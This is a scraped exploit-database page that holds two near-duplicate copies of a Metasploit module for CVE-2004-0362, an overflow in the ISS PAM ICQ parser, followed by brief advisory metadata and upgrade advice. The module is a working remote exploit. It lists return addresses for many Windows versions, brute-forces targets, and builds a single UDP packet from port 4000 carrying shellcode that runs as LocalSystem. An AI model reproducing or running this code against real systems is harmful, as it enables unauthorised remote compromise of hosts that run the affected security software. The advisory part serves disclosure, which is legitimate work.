					'MaxNops'         => 0,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Bruteforce',                   {  } ],
					[ 'Bruteforce iis-pam1.dll',      { 'Targets' => 3 .. 4  } ],
					[ 'Bruteforce NT 4.0',            { 'Targets' => 5 .. 15 } ],
					[ 'iis-pam1.dll 3.6.06',          { 'Ret' => 0x5e0a47ef } ],
					[ 'iis-pam1.dll 3.6.11',          { 'Ret' => 0x5e0da1db } ],
					[ 'WinNT SP3/SP4/SP5',            { 'Ret' => 0x777e79ab } ],
					[ 'WinNT SP4/SP5',                { 'Ret' => 0x7733b8db } ],
					[ 'WinNT SP5/SP6 - advapi32',     { 'Ret' => 0x77dcd1cb } ],
					[ 'WinNT SP3/SP5/SP6 - shell32',  { 'Ret' => 0x77cec080 } ],
					[ 'WinNT SP5/SP6 - mswsock',      { 'Ret' => 0x7767ebca } ],
					[ 'WinXP SP0/SP1 - shell32',      { 'Ret' => 0x776606af } ],
					[ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76b305a7 } ],
					[ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76e61a21 } ],
					[ 'WinXP SP0/SP1 - ws2_32',       { 'Ret' => 0x71ab7bfb } ],
					[ 'WinXP SP0/SP1 - mswsock',      { 'Ret' => 0x71a5403d } ],
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Win2000 SP0 - SP4',            { 'Ret' => 0x750231e2 } ],
					[ 'Win2000 SP2/SP3 - samlib',     { 'Ret' => 0x75159da3 } ],
					[ 'Win2000 SP0/SP1 - activeds',   { 'Ret' => 0x77ed0beb } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ],
					[ 'WinXP SP0 - SP1',              { 'Ret' => 0x71aa3a4b } ],
					[ 'Win2003 SP0',                  { 'Ret' => 0x71bf3cc9 } ],
				],
			'DisclosureDate' => 'Mar 18 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(1)
			], self.class)
	end

	def exploit
		datastore['RPORT'] = rand(65536) if rport == 1

		targs = [ target ]

		if target.name =~ /^Brute/
			if target['Targets']
				targs = []

				target['Targets'].each { |idx|
					targs << targets[idx]
				}
			else
				targs = targets.dup

				targs.delete_at(0)
				targs.delete_at(0)
				targs.delete_at(0)
			end
		end

		targs.each { |targ|
			print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")

			shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)
			email     = rand_text_english(19) + [targ.ret].pack('V') + shellcode

			# Hopefully this structure is correct -- ported from msf 2.  Blame me
			# (skape) if it doesn't work!
			packet    =
				# SRV_MULTI
				[5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') +
				# SRV_USER_ONLINE
				[5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +
				[1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +
				# SRV_META_USER
				[5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +
				"\x00\x00\x0a" + # subcommand / success
				"\x00\x00"     + # nick length / nick
				"\x00\x00"     + # first length / first
				"\x00\x00"     + # last length / last
				[email.length].pack('v') + email +
				"\x00\x00\x00\x00\x00\x00\x00"

			print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")

			connect_udp(true, { 'CPORT' => 4000 })
			udp_sock.put(packet)
			disconnect_udp

			print_status("Sleeping (giving exception handler time to recover)")

			select(nil,nil,nil,5)
		}
	end

end
		

- Vulnerability information (F83212)

ISS PAM.dll ICQ Parser Buffer Overflow (PacketStormID:F83212)
Date: 2009-11-26 00:00:00
Author: spoonm (metasploit.com)
Tags: exploit, overflow, arbitrary, udp, spoof, code execution
CVE-2004-0362
[Download]

This Metasploit module exploits a stack overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ISS PAM.dll ICQ Parser Buffer Overflow',
			'Description'    => %q{
	This module exploits a stack overflow in the ISS products that use
	the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
	will result in arbitrary code execution as LocalSystem. This exploit 
	only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
	address.

   The ISS exception handler will recover the process after each overflow, giving
	us the ability to bruteforce the service and exploit it multiple times.
			},
			'Author'         => 'spoonm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2004-0362'],
					['OSVDB', '4355'],
					['URL',   'http://www.eeye.com/html/Research/Advisories/AD20040318.html'],
					['URL',   'http://xforce.iss.net/xforce/alerts/id/166'],
				],
			'Payload'        =>
				{
					'Space'           => 504 -31 -4,
					'BadChars'        => "\x00",
					'MinNops'         => 0,
					'MaxNops'         => 0,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Bruteforce',                   {  } ],
					[ 'Bruteforce iis-pam1.dll',      { 'Targets' => 3 .. 4  } ],
					[ 'Bruteforce NT 4.0',            { 'Targets' => 5 .. 15 } ],
					[ 'iis-pam1.dll 3.6.06',          { 'Ret' => 0x5e0a47ef } ], 
					[ 'iis-pam1.dll 3.6.11',          { 'Ret' => 0x5e0da1db } ], 
					[ 'WinNT SP3/SP4/SP5',            { 'Ret' => 0x777e79ab } ], 
					[ 'WinNT SP4/SP5',                { 'Ret' => 0x7733b8db } ], 
					[ 'WinNT SP5/SP6 - advapi32',     { 'Ret' => 0x77dcd1cb } ], 
					[ 'WinNT SP3/SP5/SP6 - shell32',  { 'Ret' => 0x77cec080 } ], 
					[ 'WinNT SP5/SP6 - mswsock',      { 'Ret' => 0x7767ebca } ], 
					[ 'WinXP SP0/SP1 - shell32',      { 'Ret' => 0x776606af } ], 
					[ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76b305a7 } ], 
					[ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76e61a21 } ], 
					[ 'WinXP SP0/SP1 - ws2_32',       { 'Ret' => 0x71ab7bfb } ], 
					[ 'WinXP SP0/SP1 - mswsock',      { 'Ret' => 0x71a5403d } ], 
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Win2000 SP0 - SP4',            { 'Ret' => 0x750231e2 } ], 
					[ 'Win2000 SP2/SP3 - samlib',     { 'Ret' => 0x75159da3 } ], 
					[ 'Win2000 SP0/SP1 - activeds',   { 'Ret' => 0x77ed0beb } ], 
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ], 
					[ 'WinXP SP0 - SP1',              { 'Ret' => 0x71aa3a4b } ], 
					[ 'Win2003 SP0',                  { 'Ret' => 0x71bf3cc9 } ], 
				],
			'DisclosureDate' => 'Mar 18 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(1)
			], self.class)
	end

	def exploit
		datastore['RPORT'] = rand(65536) if rport == 1

		targs = [ target ]

		if target.name =~ /^Brute/
			if target['Targets']
				targs = []

				target['Targets'].each { |idx|
					targs << targets[idx]
				}
			else
				targs = targets.dup

				targs.delete_at(0)
				targs.delete_at(0)
				targs.delete_at(0)
			end
		end

		targs.each { |targ|
			print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")

			shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)
			email     = rand_text_english(19) + [targ.ret].pack('V') + shellcode

			# Hopefully this structure is correct -- ported from msf 2.  Blame me
			# (skape) if it doesn't work!
			packet    =
				# SRV_MULTI
				[5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + 
				# SRV_USER_ONLINE
				[5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +
				 [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +
				# SRV_META_USER
				[5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +
				 "\x00\x00\x0a" + # subcommand / success
				 "\x00\x00"     + # nick length / nick
				 "\x00\x00"     + # first length / first
				 "\x00\x00"     + # last length / last
				 [email.length].pack('v') + email + 
				 "\x00\x00\x00\x00\x00\x00\x00"

			print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")

			connect_udp(true, { 'CPORT' => 4000 })
			udp_sock.put(packet)
			disconnect_udp

			print_status("Sleeping (giving exception handler time to recover)")

			sleep(5)
		}
	end

end
    

- Vulnerability information

OSVDB 4355
ISS Multiple Products PAM Component ICQ Protocol Parsing Overflow
Location: Remote / Network Access; Attack type: Input Manipulation
Impact: Loss of Integrity; Solution: Upgrade
Exploit: Public, Commercial, Wormified; Disclosure: Vendor Verified

- Vulnerability description

Internet Security Systems' Protocol Analysis Module (PAM) contains a flaw that allows a remote attacker to execute arbitrary code. The issue is due to a series of stack based buffer overflows in the module that monitors ICQ server responses. If an attacker sends a specially crafted UDP packet that originates with a source port of 4000, they may be able to execute arbitrary code.

- Timeline

2004-03-18 2004-03-08
Unknown 2004-03-18

- Solution

Upgrade to the latest version available on the vendor website, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

